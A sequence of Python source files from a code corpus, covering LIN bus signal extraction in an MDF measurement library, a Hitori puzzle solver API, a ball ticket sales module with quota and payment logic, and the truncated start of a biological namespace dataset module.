messages = {message.arbitration_id.id: message for message in dbc}
current_not_found_ids = {
(msg_id, message.name) for msg_id, message in messages.items()
}
msg_map = {}
for i, group in enumerate(self.groups):
if (
not group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
or not group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_LIN
or not "LIN_Frame" in [ch.name for ch in group.channels]
):
continue
parents, dtypes = self._prepare_record(group)
data = self._load_data(group, optimize_read=False)
for fragment_index, fragment in enumerate(data):
if dtypes.itemsize:
group.record = np.core.records.fromstring(
fragment[0], dtype=dtypes
)
else:
group.record = None
continue
self._set_temporary_master(None)
self._set_temporary_master(self.get_master(i, data=fragment))
msg_ids = (
self.get("LIN_Frame.ID", group=i, data=fragment).astype("<u4")
& 0x1FFFFFFF
)
original_ids = msg_ids.samples.copy()
data_bytes = self.get(
"LIN_Frame.DataBytes",
group=i,
data=fragment,
samples_only=True,
)[0]
bus_t = msg_ids.timestamps
bus_msg_ids = msg_ids.samples
bus_data_bytes = data_bytes
original_msg_ids = original_ids
unique_ids = np.unique(
np.core.records.fromarrays([bus_msg_ids, bus_msg_ids])
)
total_unique_ids = total_unique_ids | set(
tuple(int(e) for e in f) for f in unique_ids
)
for msg_id_record in unique_ids:
msg_id = int(msg_id_record[0])
original_msg_id = int(msg_id_record[1])
message = messages.get(msg_id, None)
if message is None:
unknown_ids[msg_id].append(True)
continue
found_ids[dbc_name].add((msg_id, message.name))
try:
current_not_found_ids.remove((msg_id, message.name))
except KeyError:
pass
unknown_ids[msg_id].append(False)
idx = np.argwhere(bus_msg_ids == msg_id).ravel()
payload = bus_data_bytes[idx]
t = bus_t[idx]
extracted_signals = extract_mux(
payload,
message,
msg_id,
0,
t,
original_message_id=None,
ignore_value2text_conversion=ignore_value2text_conversion,
)
for entry, signals in extracted_signals.items():
if len(next(iter(signals.values()))["samples"]) == 0:
continue
if entry not in msg_map:
sigs = []
index = len(out.groups)
msg_map[entry] = index
for name_, signal in signals.items():
sig = Signal(
samples=signal["samples"],
timestamps=signal["t"],
name=signal["name"],
comment=signal["comment"],
unit=signal["unit"],
invalidation_bits=signal["invalidation_bits"]
if ignore_invalid_signals
else None,
)
sig.comment = f"""\
<CNcomment>
<TX>{sig.comment}</TX>
<names>
<display>
LIN.{message.name}.{signal['name']}
</display>
</names>
</CNcomment>"""
sigs.append(sig)
cg_nr = out.append(
sigs,
acq_name=f"from LIN message ID=0x{msg_id:X}",
comment=f"{message} 0x{msg_id:X}",
common_timebase=True,
)
if ignore_invalid_signals:
max_flags.append([False])
for ch_index, sig in enumerate(sigs, 1):
max_flags[cg_nr].append(
np.all(sig.invalidation_bits)
)
else:
index = msg_map[entry]
sigs = []
for name_, signal in signals.items():
sigs.append(
(
signal["samples"],
signal["invalidation_bits"]
if ignore_invalid_signals
else None,
)
)
t = signal["t"]
if ignore_invalid_signals:
for ch_index, sig in enumerate(sigs, 1):
max_flags[index][ch_index] = max_flags[index][
ch_index
] or np.all(sig[1])
sigs.insert(0, (t, None))
out.extend(index, sigs)
self._set_temporary_master(None)
group.record = None
cntr += 1
if self._callback:
self._callback(cntr, count)
if current_not_found_ids:
not_found_ids[dbc_name] = list(current_not_found_ids)
unknown_ids = {
msg_id for msg_id, not_found in unknown_ids.items() if all(not_found)
}
self.last_call_info["LIN"] = {
"dbc_files": dbc_files,
"total_unique_ids": total_unique_ids,
"unknown_id_count": len(unknown_ids),
"not_found_ids": not_found_ids,
"found_ids": found_ids,
"unknown_ids": unknown_ids,
}
if ignore_invalid_signals:
to_keep = []
for i, group in enumerate(out.groups):
for j, channel in enumerate(group.channels[1:], 1):
if not max_flags[i][j]:
to_keep.append((None, i, j))
tmp = out.filter(to_keep, out.version)
out.close()
out = tmp
if self._callback:
self._callback(100, 100)
if not out.groups:
logger.warning(
f'No LIN signals could be extracted from "{self.name}". The '
"output file will be empty."
)
return out
@property
def start_time(self):
"""getter and setter the measurement start timestamp
Returns
-------
timestamp : datetime.datetime
start timestamp
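Examples
--------
A minimal usage sketch:
>>> from datetime import datetime, timezone
>>> mdf = MDF()
>>> mdf.start_time = datetime(2021, 1, 1, tzinfo=timezone.utc)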
"""
return self.header.start_time
@start_time.setter
def start_time(self, timestamp):
self.header.start_time = timestamp
def cleanup_timestamps(
self, minimum, maximum, exp_min=-15, exp_max=15, version=None
):
"""convert *MDF* to other version
.. versionadded:: 5.22.0
Parameters
----------
minimum : float
minimum plausible time stamp
maximum : float
maximum plausible time stamp
exp_min (-15) : int
minimum plausible exponent used for the time stamps float values
exp_max (15) : int
maximum plausible exponent used for the time stamps float values
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default the same as
the input file
Returns
-------
out : MDF
new *MDF* object
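Examples
--------
A minimal usage sketch; the file name and limits are hypothetical. Time
stamps outside of the [0, 3600] s range or with implausible exponents
are dropped:
>>> mdf = MDF('measurement.mf4')
>>> clean = mdf.cleanup_timestamps(minimum=0, maximum=3600)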
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
out = MDF(version=version)
out.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
cg_nr = None
self.configure(copy_on_get=False)
# walk through all groups and get all channels
for i, virtual_group in enumerate(self.virtual_groups):
for idx, sigs in enumerate(
self._yield_selected_signals(virtual_group, version=version)
):
if idx == 0:
if sigs:
t = sigs[0].timestamps
if len(t):
all_ok, idx = plausible_timestamps(
t, minimum, maximum, exp_min, exp_max
)
if not all_ok:
t = t[idx]
if len(t):
for sig in sigs:
sig.samples = sig.samples[idx]
sig.timestamps = t
if sig.invalidation_bits is not None:
sig.invalidation_bits = (
sig.invalidation_bits[idx]
)
cg = self.groups[virtual_group].channel_group
cg_nr = out.append(
sigs,
acq_name=getattr(cg, "acq_name", None),
acq_source=getattr(cg, "acq_source", None),
comment=f"Timestamps cleaned up and converted from {self.version} to {version}",
common_timebase=True,
)
else:
break
else:
t, _ = sigs[0]
if len(t):
all_ok, idx = plausible_timestamps(
t, minimum, maximum, exp_min, exp_max
)
if not all_ok:
t = t[idx]
if len(t):
for i, (samples, invalidation_bits) in enumerate(sigs):
if invalidation_bits is not None:
invalidation_bits = invalidation_bits[idx]
samples = samples[idx]
sigs[i] = (samples, invalidation_bits)
out.extend(cg_nr, sigs)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
out._transfer_metadata(self)
self.configure(copy_on_get=True)
if self._callback:
out._callback = out._mdf._callback = self._callback
return out
def whereis(self, channel, source_name=None, source_path=None):
"""get ocurrences of channel name in the file
Parameters
----------
channel : str
channel name string
source_name (None) : str
filter occurrences using source name
source_path (None) : str
filter occurrences using source path
.. versionadded:: 6.0.0
Returns
-------
occurrences : tuple
Examples
--------
>>> mdf = MDF(file_name)
>>> mdf.whereis('VehicleSpeed') # "VehicleSpeed" exists in the file
((1, 2), (2, 4))
>>> mdf.whereis('VehicleSPD') # "VehicleSPD" doesn't exist in the file
()
"""
try:
occurrences = self._filter_occurrences(
self.channels_db[channel], source_name=source_name, source_path=source_path
)
except:
occurrences = tuple()
return tuple(occurrences)
if __name__ == "__main__":
pass
| lgpl-3.0 | 1,954,601,776,935,667,000 | 35.478159 | 139 | 0.448425 | false | 4.899633 | false | false | false |
nathandaddio/puzzle_app | puzzle_app/puzzle_app/engine_api/hitori_engine_api.py | 1 | 1556 | from collections import namedtuple
import transaction
from marshmallow import (
fields,
Schema,
post_load
)
from puzzle_app.schemas.hitori import (
HitoriGameBoardCellSchema,
HitoriGameBoardSchema
)
from puzzle_app.models import (
db_session_maker
)
from puzzle_app.models.hitori import (
HitoriGameBoardCell,
HitoriGameBoard,
HitoriSolve,
HITORI_SOLVE_STATUS
)
def make_hitori_engine_data(hitori_game_board_id):
db_session = db_session_maker()
hitori_game_board = db_session.query(HitoriGameBoard).get(hitori_game_board_id)
return HitoriGameBoardSchema(strict=True).dump(hitori_game_board).data
HitoriSolution = namedtuple('HitoriSolution', ['board', 'cells_on', 'cells_off', 'feasible'])
def read_hitori_engine_data(hitori_engine_solution):
solution = HitoriSolution(**hitori_engine_solution)
with transaction.manager:
db_session = db_session_maker()
board = db_session.query(HitoriGameBoard).get(solution.board)
board.solved = True
board.feasible = solution.feasible
for cell_id in solution.cells_on:
db_session.query(HitoriGameBoardCell).get(cell_id).included_in_solution = True
for cell_id in solution.cells_off:
db_session.query(HitoriGameBoardCell).get(cell_id).included_in_solution = False
def update_hitori_solve_status(solve_id, status):
with transaction.manager:
db_session = db_session_maker()
db_session.query(HitoriSolve).get(solve_id).status = HITORI_SOLVE_STATUS[status]
| mit | -4,959,705,911,207,896,000 | 26.298246 | 93 | 0.710797 | false | 3.143434 | false | false | false |
danielrichman/snowball-ticketing | snowball_ticketing/tickets/__init__.py | 1 | 25949 | # Copyright 2013 Daniel Richman
#
# This file is part of The Snowball Ticketing System.
#
# The Snowball Ticketing System is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
#
# The Snowball Ticketing System is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with The Snowball Ticketing System. If not, see
# <http://www.gnu.org/licenses/>.
"""tickets - tickets table manipulation functions"""
from __future__ import unicode_literals
import re
from datetime import datetime
import flask
from werkzeug.datastructures import ImmutableDict
from .. import utils, queries
__all__ = ["available", "quotas_per_person_sentence", "none_min",
"counts", "prices", "settings", "tickets",
"BuyFailed", "InsufficientSpare", "QPPAnyMet", "QPPTypeMet",
"FormRace", "IncorrectMode", "QuotaMet", "QuotaNotMet",
"WaitingQuotaMet",
"buy", "buy_lock", "user_pg_lock", "set_quota_met",
"FinaliseRace", "AlreadyFinalised", "NonExistantTicket",
"finalise", "outstanding_balance",
"mark_paid", "purge_unpaid", "waiting_release"]
logger = utils.getLogger("snowball_ticketing.tickets")
buy_pg_lock_num = (0x123abc, 100)
user_pg_lock_num = 0x124000
_null_settings_row = \
ImmutableDict({"quota": None, "quota_met": None,
"waiting_quota": None, "waiting_quota_met": None,
"waiting_smallquota": None, "quota_per_person": None,
"mode": 'available'})
def available(ticket_type, user_group=None, pg=utils.postgres):
"""
Find out whether `user_group` can buy `ticket_type` tickets
Returns a dict, with the following keys:
* `mode`: one of ``not-yet-open``, ``available`` or ``closed``
* `spare`: how many more can be bought
* `waiting_spare`: how many can be added to the waiting list
* `waiting_small`: Is `waiting count` < ``waiting_smallquota``?
* `qpp_any`: The smallest ``quota_per_person`` applying to any ticket type
* `qpp_type`: The smallest ``quota_per_person`` applying to this ticket type
The last five keys may be ``None``, corresponding to "no limit".
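Example (illustrative output only; real values depend on the settings
and counts in the database)::
    >>> available('standard', user_group='members')
    {'mode': 'available', 'spare': 25, 'quota_met': False, ...}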
"""
if user_group is None:
user_group = _user_group_from_user(flask.session["user"])
s = settings(pg=pg)
c = counts(pg=pg)
result = {}
overall_mode = 'available'
overall_spare = None
overall_quota_met = None
overall_waiting_spare = None
overall_waiting_quota_met = None
overall_qpp_type = None
overall_qpp_any = None
waiting_small = None
for test in _test_keys(user_group, ticket_type):
limits = s.get(test, _null_settings_row)
mode = limits["mode"]
quota = limits["quota"]
quota_met = limits["quota_met"]
count = c["{0}_{1}".format(*test)]
waiting_quota = limits["waiting_quota"]
waiting_quota_met = limits["waiting_quota_met"]
waiting_smallquota = limits["waiting_smallquota"]
waiting_count = c["waiting_{0}_{1}".format(*test)]
overall_mode = _mode_precedence(overall_mode, mode)
if quota is not None:
spare = quota - count
if spare <= 0 and not quota_met:
logger.warning("quota_met should be set: %r", test)
quota_met = True
overall_quota_met = overall_quota_met or quota_met
else:
spare = None
if waiting_quota is not None:
waiting_spare = waiting_quota - waiting_count
if waiting_spare <= 0 and not waiting_quota_met:
logger.warning("waiting_quota_met should be set: %r", test)
waiting_quota_met = True
overall_waiting_quota_met = \
overall_waiting_quota_met or waiting_quota_met
else:
waiting_spare = None
overall_spare = none_min(overall_spare, spare)
overall_waiting_spare = none_min(overall_waiting_spare, waiting_spare)
waiting_small = \
_waiting_smallquota_test(waiting_small, waiting_smallquota,
waiting_count)
qpp = limits["quota_per_person"]
if test[1] == 'any':
overall_qpp_any = none_min(overall_qpp_any, qpp)
else:
overall_qpp_type = none_min(overall_qpp_type, qpp)
return {"mode": overall_mode,
"spare": overall_spare,
"quota_met": overall_quota_met,
"waiting_spare": overall_waiting_spare,
"waiting_quota_met": overall_waiting_quota_met,
"waiting_small": waiting_small,
"qpp_any": overall_qpp_any,
"qpp_type": overall_qpp_type}
def _test_keys(user_group, ticket_type):
return ((user_group, ticket_type), (user_group, "any"),
("all", ticket_type), ("all", "any"))
def _mode_precedence(a, b):
"""
return the 'largest' of `a` and `b`
order: closed > not-yet-open > available
"""
modes = ('closed', 'not-yet-open', 'available')
assert a in modes and b in modes
for o in modes:
if a == o or b == o:
return o
else:
raise AssertionError
def _waiting_smallquota_test(old_value, quota, waiting_count):
if old_value is False:
# another rule's smallquota was not met,
# which takes precedence (think Order allow, deny)
return False
if quota is None:
# no smallquota for this row
# None -> None; True -> True
return old_value
if waiting_count < quota:
# (None, True) -> True
return True
else:
# (None, True) -> False
return False
def quotas_per_person_sentence(user_group=None, pg=utils.postgres):
"""
Get the quotas-per-person sentence for `user_group` (or the current user)
"""
if user_group is None:
user_group = _user_group_from_user(flask.session["user"])
s = settings(pg=pg)
for g in (user_group, 'all'):
p = s.get((g, 'any'), {}).get('quota_per_person_sentence')
if p is not None:
return p
else:
raise AssertionError("qpp_sentence not set for {0}".format(user_group))
def mode_sentence(pg=utils.postgres):
"""Get the "mode sentence" (describes availability)"""
return settings(pg=pg).get(('all', 'any'), {}).get("mode_sentence")
def none_min(a, b):
"""Return min(a, b), treating ``None`` as infinity"""
if a is None:
return b
if b is None:
return a
else:
return min(a, b)
def counts(drop_cache=False, pg=utils.postgres):
"""
Counts various types in the tickets table
    Will use a cached result if `drop_cache` is ``False`` (and there is one
available)
Returns a dict, with keys
``{,waiting_}{all,members,alumni}_{any,standard,vip}`` and values being the
respective counts
"""
if not drop_cache and flask.current_app and \
hasattr(flask.g, '_snowball_tickets_counts'):
return flask.g._snowball_tickets_counts
with pg.cursor(True) as cur:
cur.execute(queries.unexpired_counts)
c = cur.fetchone()
if flask.current_app:
flask.g._snowball_tickets_counts = c
return c
def prices(user_group=None, pg=utils.postgres):
"""
Gets ticket prices for `user_group` (or the current user)
Returns a dict, ``{'standard': N, 'vip': N}``.
"""
if user_group is None:
user_group = _user_group_from_user(flask.session["user"])
s = settings(pg=pg)
r = {}
for type in ('standard', 'vip'):
for key in ((user_group, type), ('all', type),
(user_group, 'any'), ('all', 'any')):
p = s.get(key, {}).get('price')
if p is not None:
r[type] = p
break
else:
raise AssertionError("unset price for {0}"
.format((user_group, type)))
return r
def _user_group_from_user(user):
"""Return the user group for the user row `user`"""
pt = user["person_type"]
assert pt != 'non-cam'
if pt == 'alumnus':
return 'alumni'
else:
return 'members'
def settings(pg=utils.postgres):
"""Retrieve (with caching) the rows of the tickets_settings table"""
if flask.current_app and hasattr(flask.g, '_snowball_tickets_settings'):
return flask.g._snowball_tickets_settings
key = ("who", "what")
s = {}
with pg.cursor(True) as cur:
cur.execute("SELECT * FROM tickets_settings")
for row in cur:
row_key = tuple([row[k] for k in key])
s[row_key] = row
if flask.current_app:
flask.g._snowball_tickets_settings = s
return s
def tickets(user_id=None, vip=None, waiting_list=None, quota_exempt=None,
finalised=None, paid=None, entered_ball=None, expired=None,
pg=utils.postgres):
"""
Return tickets for a user `user_id`, with filtering.
For each of `finalised`, `paid` and `entered_ball` - if the argument is
``True`` then that timestamp must be non-null; ``False`` it is required
to be null; ``None`` - no condition
    For `expired`, ``False`` demands the expires column be null, or in the
future; ``True`` wants a non-null timestamp in the past.
If `user_id` is ``None``, the current session's user is used.
"""
if user_id is None:
user_id = flask.session["user_id"]
cond1 = _nully_conditions(finalised=finalised, paid=paid,
entered_ball=entered_ball)
cond2 = _booly_conditions(vip=vip, waiting_list=waiting_list,
quota_exempt=quota_exempt)
if expired is True:
expires_cond = "(expires IS NOT NULL AND expires <= utcnow())"
elif expired is False:
expires_cond = "(expires IS NULL OR expires > utcnow())"
else:
expires_cond = "TRUE"
cond = " AND ".join(["user_id = %s", expires_cond, cond1, cond2])
query = "SELECT * FROM tickets WHERE " + cond
with pg.cursor(True) as cur:
cur.execute(query, (user_id, ))
return cur.fetchall()
def _nully_conditions(**kwargs):
"""
Generate IS [ NOT ] NULL conditions for the keys in `kwargs`
Several columns in the tickets table are timestamps,
where their being non-null indicates that something has happened;
for example, `tickets.finalised` being non-null means that a ticket
is finalised.
For each key, where `value` is ``kwargs[key]``:
*If `value` is ``None``, no condition is generated - i.e., "don't care" or
"all"
*If `value` is ``True``, produces the condition "{name} IS NOT NULL"
*If `value` is ``False``, produces the condition "{name} IS NULL"
The conditions are joined with ``AND`` and wrapped in parentheses
"""
conditions = []
for key, value in kwargs.items():
if value is True:
conditions.append(key + " IS NOT NULL")
elif value is False:
conditions.append(key + " IS NULL")
if not conditions:
return "TRUE"
else:
return "(" + ' AND '.join(conditions) + ")"
def _booly_conditions(**kwargs):
"""
Generate conditions for the keys in `kwargs`
For each key, where `value` is ``kwargs[key]``:
*If `value` is ``None``, no condition is generated - i.e., "don't care" or
"all"
*If `value` is ``True``, produces the condition "{name}"
*If `value` is ``False``, produces the condition "NOT {name}"
The conditions are joined with ``AND`` and wrapped in parentheses
"""
conditions = []
for key, value in kwargs.items():
if value is True:
conditions.append(key)
elif value is False:
conditions.append("NOT " + key)
if not conditions:
return "TRUE"
else:
return "(" + ' AND '.join(conditions) + ")"
class BuyFailed(Exception):
"""A call to :func:`buy` failed"""
class InsufficientSpare(BuyFailed):
"""Insufficient spare tickets"""
class QPPAnyMet(BuyFailed):
"""Quota per person limit (any ticket type) met"""
class QPPTypeMet(BuyFailed):
"""Quota per person limit (specific ticket type) met"""
class FormRace(BuyFailed):
"""Between displaying options and submitting things changed"""
class IncorrectMode(FormRace):
"""Tickets are not ``available``"""
class QuotaMet(FormRace):
"""The quota has been met"""
class QuotaNotMet(FormRace):
"""The quota has not been met (and so you may not join the waiting list)"""
class WaitingQuotaMet(QuotaMet):
"""The waiting quota has been met"""
def buy(ticket_type, waiting_list, number,
user=None, quota_exempt=False, pg=utils.postgres):
"""Buy `user` `number` `ticket_type` tickets / add to waiting list."""
if user is None:
user = flask.session["user"]
user_id = user["user_id"]
user_group = _user_group_from_user(user)
if not waiting_list:
verb = ('buying', '')
else:
verb = ('adding', ' to the waiting list')
log_prefix = "{0} {1} {2} tickets for user {3} ({4}){5}" \
.format(verb[0], number, ticket_type, user_id, user_group, verb[1])
# automatically released, recursive
buy_lock(pg=pg)
user_pg_lock(user["user_id"], pg=pg)
vip = ticket_type == 'vip'
# force a re-count having acquired the lock
ticket_counts = counts(drop_cache=True, pg=pg)
if not quota_exempt:
avail = available(ticket_type, user_group=user_group, pg=pg)
qpp_any_count = 0
qpp_type_count = 0
for ticket in tickets(user_id=user_id, expired=False,
quota_exempt=False, pg=pg):
qpp_any_count += 1
if ticket["vip"] == vip:
qpp_type_count += 1
qpp_any = avail["qpp_any"]
qpp_type = avail["qpp_type"]
if qpp_any is not None:
if qpp_any < qpp_any_count + number:
raise QPPAnyMet
if qpp_type is not None:
if qpp_type < qpp_type_count + number:
raise QPPTypeMet
if avail["mode"] != "available":
logger.info("%s: not available (form race)", log_prefix)
raise IncorrectMode
if waiting_list and not avail["quota_met"]:
logger.info("%s: wanted waiting list but quota not met (form race)",
log_prefix)
raise QuotaNotMet
if not waiting_list:
quota_met = avail["quota_met"]
spare = avail["spare"]
else:
quota_met = avail["waiting_quota_met"]
spare = avail["waiting_spare"]
if quota_met:
logger.info("%s: quota met (form race)", log_prefix)
if waiting_list:
raise WaitingQuotaMet
else:
raise QuotaMet
if spare is not None and spare < number:
logger.info("%s: insufficient spare (%s < %s)", log_prefix,
spare, number)
set_quota_met(user_group, ticket_type, waiting_list, number, pg=pg)
raise InsufficientSpare
elif spare == number:
logger.info("%s: exactly met quota", log_prefix)
set_quota_met(user_group, ticket_type, waiting_list, number, pg=pg)
# else... OK. Make some tickets
query = "INSERT INTO tickets (user_id, vip, waiting_list, price, "\
" created, expires, expires_reason, quota_exempt) "
values_row = "(%(user_id)s, %(vip)s, %(waiting_list)s, %(price)s, " \
"utcnow(), utcnow() + '10 minutes'::interval, " \
"'not-finalised', %(quota_exempt)s)"
values = ', '.join([values_row] * number)
query += "VALUES " + values + " RETURNING ticket_id"
price = prices(user_group=user_group, pg=pg)[ticket_type]
args = {"user_id": user_id, "vip": vip, "waiting_list": waiting_list,
"price": price, "quota_exempt": quota_exempt}
# if :func:`counts` is cached on flask.g, this will update it
if waiting_list:
p = "waiting_{0}_{1}"
else:
p = "{0}_{1}"
for test in _test_keys(user_group, ticket_type):
ticket_counts[p.format(*test)] += number
with pg.cursor() as cur:
cur.execute(query, args)
ids = [r[0] for r in cur]
logger.info("%s: inserted tickets %r", log_prefix, ids)
return ids
def buy_lock(pg=utils.postgres):
"""Take out the transaction level postgres advisory lock for buying"""
logger.debug("Acquiring buy lock")
with pg.cursor() as cur:
cur.execute("SELECT pg_advisory_xact_lock(%s, %s)", buy_pg_lock_num)
logger.debug("buy lock acquired")
def user_pg_lock(user_id, pg=utils.postgres):
"""
Take out the transaction level postgres advisory lock for `user_id`
This lock is acquired by :func:`buy`, :func:`finalise` and
:func:`receipt.send_update`.
"""
logger.debug("Acquiring user %s lock", user_id)
with pg.cursor() as cur:
cur.execute("SELECT pg_advisory_xact_lock(%s, %s)",
(user_pg_lock_num, user_id))
logger.debug("user %s lock acquired", user_id)
def set_quota_met(user_group, ticket_type, waiting_list, number,
pg=utils.postgres):
"""
Take action when a quota has been met.
Suppose:
* person A buys the last 4 tickets
* person B then has to go on the waiting list
* ten minutes later, A has not finalised their tickets and so they expire
    * person C could now come and buy those 4 tickets, jumping B in the queue
Hence: as soon as we `meet` the quota, change the mode.
Note: this is not as soon as we go `over` the quota - hitting it exactly
counts, since as soon as the quota is met the text will show
'waiting list' on the buy buttons.
"""
s = settings(pg=pg)
c = counts(pg=pg)
rows_quota_met = []
rows_waiting_quota_met = []
for test in _test_keys(user_group, ticket_type):
limits = s.get(test, _null_settings_row)
assert limits["mode"] == 'available'
just_set_quota_met = False
if not waiting_list:
quota = limits["quota"]
count = c["{0}_{1}".format(*test)]
if quota is not None and not limits["quota_met"] and \
count + number >= quota:
logger.warning("quota met: %r", test)
rows_quota_met.append(test)
# if `s` came from or was saved to the cache on flask.g,
# this will update it.
s.get(test, {})["quota_met"] = True
# now check if the waiting quota has been met; it could happen
# instantly
just_set_quota_met = True
if waiting_list or just_set_quota_met:
quota = limits["waiting_quota"]
count = c["waiting_{0}_{1}".format(*test)]
if just_set_quota_met:
number2 = 0
else:
number2 = number
if quota is not None and not limits["waiting_quota_met"] and \
count + number2 >= quota:
logger.warning("waiting quota met: %r", test)
rows_waiting_quota_met.append(test)
s.get(test, {})["waiting_quota_met"] = True
if rows_quota_met:
logger.info("set_quota_met: setting quota_met on rows %r", rows_quota_met)
with pg.cursor() as cur:
cur.execute("UPDATE tickets_settings SET quota_met = TRUE "
"WHERE (who, what) IN %s", (tuple(rows_quota_met), ))
if rows_waiting_quota_met:
logger.info("set_quota_met: setting waiting_quota_met on rows %r",
rows_waiting_quota_met)
with pg.cursor() as cur:
cur.execute("UPDATE tickets_settings SET waiting_quota_met = TRUE "
"WHERE (who, what) IN %s",
(tuple(rows_waiting_quota_met), ))
class FinaliseRace(Exception):
"""A race condition occured in :func:`finalise`"""
class AlreadyFinalised(FinaliseRace):
"""
The ticket was already finalised
.. attribute:: new_ticket
The ticket, as it now exists in the database finalised.
"""
def __init__(self, new_ticket):
self.new_ticket = new_ticket
class NonExistantTicket(FinaliseRace):
"""The ticket does not exist"""
def finalise(ticket, update, pg=utils.postgres):
"""
Finalise a ticket
Essentially does this::
ticket["finalised"] = datetime.utcnow()
ticket.update(update)
But also updates the corresponding database row, and will avoid a race.
Does not check if the ticket is expired. Loading the tickets at the start
of :func:`snowball_ticketing.tickets.views.details` should not race against
the ticket expiring since ``utcnow()`` remains constant in a transaction.
If the ticket is deleted between loading and updating,
:class:`NonExistantTicket` will be raised and `ticket` won't be modified.
If the ticket was already finalised, :class:`AlreadyFinalised` is raised.
"""
assert ticket["finalised"] is None
assert set(update) <= {"person_type", "surname", "othernames",
"college_id", "matriculation_year"}
logger.debug("finalising ticket %s", ticket["ticket_id"])
# protects against races with receipt
user_pg_lock(ticket["user_id"], pg=pg)
update = update.copy()
# special case finalise to use utcnow()
update["expires"] = None
update["expires_reason"] = None
sets = ', '.join("{0} = %({0})s".format(key) for key in update)
query1 = "UPDATE tickets " \
"SET finalised = utcnow(), " + sets + " " \
"WHERE ticket_id = %(ticket_id)s AND finalised IS NULL " \
"RETURNING *"
query2 = "SELECT * FROM tickets WHERE ticket_id = %s"
args = update
args["ticket_id"] = ticket["ticket_id"]
with pg.cursor(True) as cur:
cur.execute(query1, args)
assert cur.rowcount in (0, 1)
if cur.rowcount == 1:
# success
ticket.update(cur.fetchone())
else:
# some race
cur.execute(query2, (ticket["ticket_id"], ))
assert cur.rowcount in (0, 1)
if cur.rowcount == 1:
raise AlreadyFinalised(cur.fetchone())
else:
raise NonExistantTicket
_reference_first_cleaner = re.compile("[^a-zA-Z0-9]")
def reference(user=None):
"""Get the payment reference `user` should use"""
if user is None:
user = flask.session["user"]
if user["crsid"]:
first = user["crsid"]
else:
first = _reference_first_cleaner.sub("", user["email"])[:9]
# we're aiming for < 18 characters. The id isn't going to realistically
# be longer than 4 characters, so this will work just fine.
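    # e.g. (hypothetical) crsid "abc123" with user_id 45 gives "abc123/0045"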
second = unicode(user["user_id"]).rjust(4, "0")
return "{0}/{1}".format(first, second)
def outstanding_balance(user_id=None, ids_too=False, pg=utils.postgres):
"""
Get the total unpaid for `user_id` (or the current user)
If `ids_too` is ``True``, returns ``total unpaid, ticket_ids``
"""
ts = tickets(user_id=user_id, finalised=True, paid=False,
waiting_list=False, pg=pg)
bal = sum(t["price"] for t in ts)
if ids_too:
ids = [t["ticket_id"] for t in ts]
return bal, ids
else:
return bal
def mark_paid(ticket_ids, add_note="", pg=utils.postgres):
"""Mark each of `ticket_ids` paid, optionally adding to `notes`"""
query = "UPDATE tickets " \
"SET paid = utcnow(), notes = notes || %s " \
"WHERE ticket_id IN %s AND paid IS NULL"
with pg.cursor() as cur:
cur.execute(query, (add_note, tuple(ticket_ids)))
assert cur.rowcount == len(ticket_ids)
def purge_unpaid(user_id, ticket_id, pg=utils.postgres):
"""
Mark `ticket_id` unpaid and unfinalised
`user_id` must match the `user_id` on the ticket (safety check).
"""
query = "UPDATE tickets " \
"SET finalised = NULL, expires = utcnow(), " \
" expires_reason = 'not-paid' " \
"WHERE finalised IS NOT NULL AND paid IS NULL AND " \
" NOT waiting_list AND " \
" user_id = %s AND ticket_id = %s"
logger.info("Purging ticket %s (not-paid)", ticket_id,
extra={"user_id": user_id})
with pg.cursor() as cur:
cur.execute(query, (user_id, ticket_id))
assert cur.rowcount == 1
def waiting_release(user_id, ticket_ids, ask_pay_within=7, pg=utils.postgres):
"""Release tickets to `user_id`, and send them an email"""
query = "UPDATE tickets SET waiting_list = FALSE, notes = notes || %s " \
"WHERE finalised IS NOT NULL AND waiting_list AND " \
" ticket_id IN %s AND user_id = %s"
notes = "Released from waiting list on {0}\n".format(datetime.utcnow())
logger.info("Releasing tickets %s from waiting list", list(ticket_ids),
extra={"user_id": user_id})
with pg.cursor() as cur:
cur.execute(query, (notes, tuple(ticket_ids), user_id))
assert cur.rowcount == len(ticket_ids)
# :-( :-( circular import.
from . import receipt
receipt.send_update(user_id, pg=pg, ask_pay_within=ask_pay_within,
waiting_release=True)
| gpl-3.0 | -6,056,314,305,332,957,000 | 31.68136 | 82 | 0.589002 | false | 3.673935 | true | false | false |
OpenBEL/resource-generator | datasets.py | 1 | 33416 |
'''
datasets.py
Represent each parsed dataset as an object. This is
really just a wrapper to the underlying dictionaries,
but it also provides some useful functions that assist
in the namespacing and equivalencing process.
'''
import os.path
import time
from common import get_citation_info
from collections import defaultdict
class DataSet():
def __init__(self, dictionary={}, prefix='unnamed-data-object'):
self._dict = dictionary
self._prefix = prefix
def get_values(self):
''' Get all non-obsolete primary ids in dictionary.'''
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
continue
else:
yield term_id
def __str__(self):
return self._prefix
class OrthologyData(DataSet):
def __init__(self, dictionary={}, prefix='use-index-term-prefix'):
super().__init__(dictionary, prefix)
def get_orthologs(self, term_id):
orthologs = set()
mapping = self._dict.get(term_id)
mouse_orthologs = mapping.get('mouse_ortholog_id').split('|')
orthologs.update(mouse_orthologs)
        if mapping.get('human_ortholog_id') != '':
human_orthologs = mapping.get('human_ortholog_id').split('|')
human_orthologs = {'HGNC:' + ortho for ortho in human_orthologs}
orthologs.update(human_orthologs)
return orthologs
def __str__(self):
return self._prefix + '_ortho'
class HomologeneData(OrthologyData):
def __init__(self, dictionary={}, prefix='egid'):
super().__init__(dictionary, prefix)
def get_values(self):
for term_id in self._dict['gene_ids']:
yield term_id
def get_orthologs(self, term_id):
orthologs = set()
mapping = self._dict.get('gene_ids').get(term_id)
group = mapping.get('homologene_group')
species = mapping.get('tax_id')
for k, v in self._dict['homologene_groups'][group].items():
if k == species and len(v) > 1:
return set() # stop here, don't return any orthologs since homologene group contains paralog
elif k == species:
next
